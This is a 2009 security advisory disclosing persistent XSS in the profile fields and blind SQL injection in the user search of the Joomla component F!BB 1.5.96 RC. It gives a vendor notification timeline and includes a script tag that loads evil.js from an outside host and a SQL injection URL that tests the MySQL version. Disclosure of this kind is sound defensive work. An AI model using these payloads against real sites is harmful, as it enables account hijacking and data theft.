Thursday, 17 September 2009 00:00
The Joomla component F!BB 1.5.96 RC suffers from multiple persistent XSS vulnerabilities, as well SQL Injection in its user search feature.
ICQ, MSN Profile Fields XSSThe MSN field will be rendered in the page twice.
AIM Profile Field XSSThis vulnerability has a limited number of characters, but this will inject script:
"><script src=//jeffchannell.com/evil.js></scriptNOTE: Skype, Gtalk, website fields are also vulnerable, though the window for injection is even smaller!
Blind SQL InjectionREQUIRES: magic_quotes_gpc OFF
index.php?option=com_fbb&func=advsearch&q=&exactname=1&childforums=1&limitstart=0&searchuser=%' AND SUBSTRING(@@version,1,1)=5 -- 'If MySQL is version 5, this will return results. Otherwise, no results.
- Vulnerabilities Discovered: 31 July 2009
- Vendor Notified: 31 July 2009
- Vendor Response: 31 July 2009
- Update Available: ... 2009
- Disclosure: 17 September 2009
Last Updated on Thursday, 30 September 2010 17:38
The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.